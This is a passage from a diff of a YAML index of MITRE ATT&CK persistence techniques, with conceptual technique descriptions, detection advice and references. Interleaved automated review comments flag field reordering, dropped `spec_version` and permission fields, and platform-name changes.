, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
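Review bot: most of this hunk is the T1556.003 fields (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `external_references`) being deleted from the top of the object; if they are re-emitted further down with the same values, only the key order changed, and having the generator emit keys in a fixed order would keep regenerations down to the lines that actually changed. The substantive change here is `modified: '2022-05-11T14:00:00.188Z'` -> `'2024-08-21T16:19:55.082Z'`.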
@@ -27524,20 +27876,57 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1574.007:
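Review bot: `x_mitre_permissions_required: [root]` is removed from T1556.003 with nothing replacing it, so any tooling that reads that field to decide the privilege level a test needs will no longer see `root` for this technique; confirm the field was dropped upstream with the `x_mitre_version` bump to '2.1' rather than lost by the generator. The reference order also changes (`PAM Creds` now precedes `Red Hat PAM`) and `url` moves after `description` within each entry; both are cosmetic but inflate the diff.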
@@ -27627,7 +28016,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -27715,7 +28103,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -27800,11 +28187,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -27882,7 +28268,6 @@ persistence:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1546.006:
@@ -27915,7 +28300,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -27938,11 +28323,10 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -28000,9 +28384,8 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1542.001:
@@ -28083,12 +28466,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -28107,7 +28489,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -28121,7 +28502,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -28148,8 +28528,8 @@ persistence:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -28180,7 +28560,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
@@ -28237,11 +28618,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -28313,9 +28693,9 @@ persistence:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -28331,12 +28711,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -28411,7 +28790,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1542.005:
@@ -28454,7 +28832,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28478,8 +28856,6 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
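Review bot: both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are dropped from T1542.005 here; unless the attack spec version is re-emitted elsewhere in this object, the TFTP Boot entry ends up with no `x_mitre_attack_spec_version` while the other objects in this diff keep one, which is worth checking before merge.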
T1543.003:
technique:
@@ -28634,31 +29010,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -28675,6 +29031,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -28685,9 +29042,13 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -28695,17 +29056,37 @@ persistence:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1137:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:01:21.255Z'
+ name: Office Application Startup
+ description: |-
+ Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+ A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Nick Carr, Mandiant
- Microsoft Threat Intelligence Center (MSTIC)
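Review bot: for T1137 the platform list changes from `Office 365` to `Office Suite` (`x_mitre_platforms` in the added block); anything that filters or indexes techniques by platform name needs to be regenerated with the new value, or T1137 will silently drop out of the Office-related listings. The rest of this hunk is field reordering (`modified`, `name`, `description` and `kill_chain_phases` moved to the top) plus the T1053.003 fields being re-emitted at the bottom of that object.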
@@ -28713,79 +29094,73 @@ persistence:
- Praetorian
- Loic Jaquemet
- Ricardo Dias
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+ Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.4'
+ x_mitre_data_sources:
+ - 'File: File Creation'
+ - 'Application Log: Application Log Content'
+ - 'Windows Registry: Windows Registry Key Modification'
+ - 'File: File Modification'
+ - 'Module: Module Load'
+ - 'Process: Process Creation'
+ - 'Windows Registry: Windows Registry Key Creation'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
created: '2017-12-14T16:46:06.044Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137
url: https://attack.mitre.org/techniques/T1137
- - source_name: SensePost Ruler GitHub
- url: https://github.com/sensepost/ruler
- description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
- services. Retrieved February 4, 2019.'
+ external_id: T1137
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- source_name: TechNet O365 Outlook Rules
- url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
description: Koeller, B.. (2018, February 21). Defending Against Rules and
Forms Injection. Retrieved November 5, 2019.
+ url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
- source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: SensePost Ruler GitHub
+ description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+ services. Retrieved February 4, 2019.'
+ url: https://github.com/sensepost/ruler
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Office Application Startup
- description: |-
- Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
- A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- x_mitre_detection: |-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
- Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
- x_mitre_version: '1.3'
+ url: https://github.com/sensepost/notruler
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'File: File Creation'
- - 'Application Log: Application Log Content'
- - 'Windows Registry: Windows Registry Key Modification'
- - 'File: File Modification'
- - 'Module: Module Load'
- - 'Process: Process Creation'
- - 'Windows Registry: Windows Registry Key Creation'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1137
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
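Review bot: nearly all of this hunk is key reordering of the T1137 object (the external_references are re-emitted with `description` before `url`, and the domains, platforms and data sources move above `type`), which buries the substantive changes: `x_mitre_version` '1.3' to '1.4', `x_mitre_attack_spec_version` 2.1.0 to 3.2.0, `revoked: false` added, and `x_mitre_permissions_required` (User, Administrator) plus `spec_version: '2.1'` dropped with no replacement. Consider making the generator emit keys in a stable order so later diffs show only content changes, and state the removal of `spec_version` and the permissions field in the commit message, since every object in this change loses `spec_version`. The four citations in the retained detection text (CrowdStrike Outlook Forms, Outlook Today Home Page, Microsoft Detect Outlook Forms, SensePost NotRuler) all still match a `source_name` in the rewritten reference list, so nothing dangles.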
@@ -28815,6 +29190,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -28825,6 +29201,7 @@ persistence:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -28833,13 +29210,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
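Review bot: the platform list for T1098.003 drops `Office 365`, `Google Workspace` and `Azure AD` in favour of `Office Suite` and `Identity Provider`, alongside the version bump '2.4' to '2.5'. Anything downstream that filters this index on the old platform strings will silently match nothing after this, so the per-platform index files should be regenerated in the same commit and the rename called out in the commit message. The `x_mitre_modified_by_ref` added here carries the same value that is removed further down in the entry, so it is a move rather than a change.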
@@ -28881,9 +29258,6 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -28951,19 +29325,18 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -28979,8 +29352,8 @@ persistence:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -28994,7 +29367,7 @@ persistence:
x_mitre_is_subtechnique: true
